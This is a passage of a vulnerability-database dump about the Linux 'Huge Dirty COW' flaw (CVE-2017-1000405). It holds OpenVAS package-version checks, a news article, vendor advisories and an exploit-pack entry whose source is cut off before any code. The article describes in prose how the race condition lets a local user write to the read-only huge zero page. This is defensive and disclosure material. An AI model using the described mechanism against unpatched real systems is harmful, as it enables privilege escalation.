WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843400\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-09 07:39:26 +0100 (Sat, 09 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3509-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1005-aws\", ver:\"4.4.0-1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873860", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873860", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-b0c1f44130", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_b0c1f44130_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-b0c1f44130\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873860\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:55:57 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-b0c1f44130\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-b0c1f44130\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6LLKSHB3TZCA72UK4KDILWHY4Q4RTGU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~302.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873857", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873857", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-9ea11e444d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9ea11e444d_kernel_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-9ea11e444d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873857\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:54:59 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-9ea11e444d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9ea11e444d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2ALUMLCIZOR6UUC5NJKXPGIAXHBJR6NL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~202.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:03", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2017-1000405"], "description": "A flaw in the original patch for the notorious Dirty COW vulnerability could allow an adversary to run local code on affected systems and exploit a race condition to perform a privilege escalation attack.\n\nThe flaw in the Dirty COW patch (CVE-2016-5195), [released in October 2016](<https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/>), was identified by researchers at the security firm Bindecy. On Wednesday, [they released details](<http://www.openwall.com/lists/oss-security/2017/11/30/1>) of the vulnerability ([CVE-2017-1000405](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000405>)) found in the original Dirty COW patch, affecting several Linux distributions.\n\nThe scope of affected products is significantly smaller than the original Dirty COW bug, which impacted many more Linux distributions and the Android operating system.\n\n\u201cIn terms of scope, the difference is just that the current bug is not [applicable to Android](<https://threatpost.com/google-releases-supplemental-patch-for-dirty-cow-vulnerability/121843/>) and Red Hat Enterprise Linux. All other distributions \u2013 Ubuntu, Fedora, SUSE \u2013 suffer from the issue. So, the scope is still large. We estimate that millions of machines are vulnerable,\u201d said Daniel Shapiro, researcher at Bindecy, credited for finding the flaw along with colleague Eylon Ben Yaakov.\n\nThe vulnerability, CVE-2017-1000405, is rated \u201cImportant\u201d and scores 6.1 on the CVSS scale.\n\nRed Hat Software notified customers of the flawed patch on Thursday noting the issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 5, 6, 7 and Red Hat Enterprise MRG 2, according to Red Hat\u2019s [customer portal](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\nDirty COW was patched in October 2016 after it was discovered in public exploits. The vulnerability was found in the copy-on-write (COW) feature in Linux and could be used by an attacker with local access to obtain root privileges on a Linux or Android device.\n\nThe flaw, which was introduced in 2007 in version 2.6.22 of the kernel, allows an attacker to elevate privileges by taking advantage of a race condition and gain write-access to read-only memory.\n\nThe flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.\n\nCopy-on-write manages memory resources and allows for more than one process to share a page until a user writes to it, known in programming as marking a page dirty. The vulnerability allows an attacker to exploit the race condition to write to the original page before it\u2019s marked dirty.\n\nThe October 2016 patch addressed the Dirty COW vulnerability for both regular pages and transparent huge pages (supported since kernel approximately 2.6.38), according to Shapiro.\n\n\u201cThere is a code flow that wasn\u2019t taken into account that breaks the logic of the patch for transparent huge pages,\u201d he said.\n\n\u201cIn the original vulnerability the exploit targeted pages backed by read-only files, with the new bug we could write to a read-only special huge-page called \u2018zero page\u2019. It is assumed to be initialized with zeroes and some software rely on that assumption (including privileged processes),\u201d Shapiro said.\n\nA more detailed description of the flaw can be found in a technical write-up by Yaakov [here](<https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0>).\n\nAccording to the disclosure timeline, researchers reported the vulnerability to the Linux Kernel Organization on Nov. 22. A CVE was assigned the same day and a patch was committed to the mainline kernel Nov. 27. The vulnerability was officially made public on Friday.\n\nImmediate mitigation includes disabling the use of \u201czero page\u201d.\n\n\u201cIt is possible to prevent the zero page from being mapped as a huge page, by modifying a configuration tunable in the /sys directory\u2026 This prevents the flaw from being exercised in this method. # echo 0 > /sys/kernel/mm/transparent_hugepage/use_zero_page Disabling huge pages: It is possible to mitigate this flaw by disabling hugepages on a system,\u201d according to a [description of mitigations steps](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\n\u201cThe real deal here is the astonishing fact that such a hyped vulnerability was patched incompletely,\u201d Shapiro said.\n", "modified": "2017-12-01T11:43:06", "published": "2017-12-01T11:43:06", "id": "THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087", "href": "https://threatpost.com/flaw-found-in-dirty-cow-patch/129064/", "type": "threatpost", "title": "Flaw Found In Dirty COW Patch", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195", "CVE-2017-1000405"], "description": "The kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es):\n\n* A flaw was found in the patches used to fix the 'dirtycow' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. (CVE-2017-1000405)\n\nRed Hat would like to thank Eylon Ben Yaakov and Daniel Shapiro for reporting this issue.\n\nBug Fix(es):\n\n* Previously, Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package, did not support turning off transactional memory (TM) on the POWER9 systems. With this update it is now possible to turn off TM on the POWER9 systems. (BZ#1509974)\n\n* Due to a bug in the ixgbe and i40e drivers, the socket buffer list (skb list) in some cases got corrupted when running Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package on the POWER9 systems. Consequently, a kernel panic occurred. This update fixes ixgbe and i40e, and the kernel no longer panics due to this behavior. (BZ#1518412)\n\n* Users can lower the max_sectors_kb setting in the sysfs file system to accommodate certain workloads. Previously, users needed to set the maximum I/O size to either the block layer default or the optional preferred I/O size reported by the device. This update fixes the scsi driver to keep the current heuristic function for the initial setting of max_sectors_kb. As a result, for subsequent invocations, the driver now only updates the current queue limit if it exceeds the capabilities of the hardware. (BZ#1518432)\n\n* When performing full-bootme tests on Boston ESS systems running Red Hat Enterprise Linux 7.4 with the kernel version provided in the kernel-alt package, a kernel panic occurred and the operating system dropped into the XMON software. This update fixes the Multi-Queue Block IO Queueing Mechanism (blk-mq), and the kernel no longer panics in these circumstances. (BZ#1518433)\n\n* When running the stress test on the file system with the gssstress command, and pulling one disk from one recovery group, \"kernel I/O error\" was reported, and gssstress became unresponsive. Gssstress now works as expected under the described circumstances. (BZ#1522645)\n\n* When using the fwupdate_xl710 utility to apply updates for NVM Intel Ethernet Converged Network Adapter XL710 on machines running Red Hat Enterpise Linux 7.4 with the kernel version provided in the kernel-alt package, a deadlock sometimes occurred when the i40e driver was acquiring access to the Non-Volatile Memory (NVM) of the device. Consequently, NVM acquire timeouts occurred, the firmware update failed with the following error message: \"Failed Acquiring NVM resource for read err=-53 status=0xa\", and left the device's memory in a corrupted state. This update fixes the i40e driver, and the firmware updates no longer fail due to this behavior. (BZ#1522843)\n\n* Previously, on POWER9 systems with more than 100 Pstates, the cpufreq driver did not handle the cases when the NxN matrix denominated transition table (trans_table) overflowed beyond the PAGE_SIZE boundary correctly. Consequently, reading trans_table for any of the CPUs failed with the following error:\n\n\"fill_read_buffer: show+0x0/0xa0 returned bad count\"\n\nWith this update reading trans_table for any of the CPUs now proceeds as expected under the described circumstances. (BZ#1522844)\n\n* Previously, the /sys/firmware/opal/exports directory did not contain an export node. Consequently, a range of memory in the Open Power Abstraction Layer (OPAL) that the operating system attempted to export to user space for debugging purposes was not available. With this update the sysfs file under /sys/firmware/opal/exports is now available for each property found there, and this file can be used for debugging purposes. (BZ#1522845)", "modified": "2018-03-19T16:23:48", "published": "2018-01-25T15:47:54", "id": "RHSA-2018:0180", "href": "https://access.redhat.com/errata/RHSA-2018:0180", "type": "redhat", "title": "(RHSA-2018:0180) Important: kernel-alt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:39", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es):\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824, Important)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Previously, there were cases where the ethtool kernel code called the vzalloc() function, which allocates virtually contiguous memory with zero fill, with a size of zero. Consequently, running the ethtool -d command to query hardware registers led to the following dmesg error:\n\n ethtool: vmalloc: allocation failure: 0 bytes, mode:0x24080c2(GFP_KERNEL|__GFP_HIGHMEM|__GFP_ZERO)\n\nWith this update, the kernel code has been fixed to avoid the invalid vzalloc call, and the dmesg error no longer occurs. (BZ#1530128)\n\n* Previously, if an NFSv4 mount operation encountered an NFS client structure that has not completed initialization, the trunking detection logic waited for the operation to complete. Consequently, if a concurrent NFSv4 mount operation added another item to the list of NFS client structures, this client was not able to begin initialization, because it was waiting on the mutex held by the other process, and a deadlock occurred. This update fixes NFS to wait until the NFS client structure initialization is completed before adding a new structure to the list. As a result, the deadlock no longer occurs, and the NFS client can now initialize as expected under the described circumstances. (BZ#1530134)\n\n* If the Extensible Firmware Interface (EFI) created a new set of page tables and mapped a segment of code at a low address, the operating system (OS) failed to boot. This update fixes the EFI code, and the OS now boots as expected under the described circumstances. (BZ#1535880)\n\n* The Return Trampoline (Retpoline) mechanism mitigates the branch target injection, also known as the Spectre variant 2 vulnerability. With this update, Retpoline has been implemented into the Red Hat Enterprise Linux kernel. (BZ#1539648)\n\n* This update adds a new line to the /proc/cpuinfo file to show all available facilities that are reported by the stfle instruction on IBM z systems. (BZ#1540088)", "modified": "2018-03-06T23:31:52", "published": "2018-03-06T23:25:35", "id": "RHSA-2018:0399", "href": "https://access.redhat.com/errata/RHSA-2018:0399", "type": "redhat", "title": "(RHSA-2018:0399) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:45", "bulletinFamily": "software", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "# \n\n# Severity\n\nUnspecified\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a regression that prevented the Ceph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16643)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is unspecified unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.49\n * 3363.x versions prior to 3363.45\n * 3421.x versions prior to 3421.35\n * 3445.x versions prior to 3445.21\n * 3468.x versions prior to 3468.16\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3312.x versions to 3312.49\n * Upgrade 3363.x versions to 3363.45\n * Upgrade 3421.x versions to 3421.35\n * Upgrade 3445.x versions to 3445.21\n * Upgrade 3468.x versions to 3468.16\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n\n# References\n\n * [USN-3509-4](<https://usn.ubuntu.com/3509-4>)\n", "edition": 2, "modified": "2017-12-16T00:00:00", "published": "2017-12-16T00:00:00", "id": "CFOUNDRY:74EC63FE794662FC4DFD36709B39475A", "href": "https://www.cloudfoundry.org/blog/usn-3509-4/", "title": "USN-3509-4: Linux kernel (Xenial HWE) regression | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:38", "bulletinFamily": "software", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>))\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. ([CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)) Please note: this CVE is also known colloquially as \u201chuge dirty cow\u201d.\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>))\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3421.x versions prior to 3421.34\n * 3445.x versions prior to 3445.19\n * 3468.x versions prior to 3468.13\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3421.x versions prior to 3421.34\n * Upgrade 3445.x versions prior to 3445.19\n * Upgrade 3468.x versions prior to 3468.13\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3509-2](<http://www.ubuntu.com/usn/usn-3509-2/>)\n * [CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>)\n * [CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)\n * [CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>)\n * [CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>)\n", "edition": 5, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B", "href": "https://www.cloudfoundry.org/blog/usn-3509-2/", "title": "USN-3509-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)", "edition": 1, "published": "2017-11-30T00:00:00", "title": "Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-11-30T00:00:00", "id": "EXPLOITPACK:D8B1BFCB08D0FAA92CCBDBD01EF88A3F", "href": "", "sourceData": "// EDB Note: Source ~ 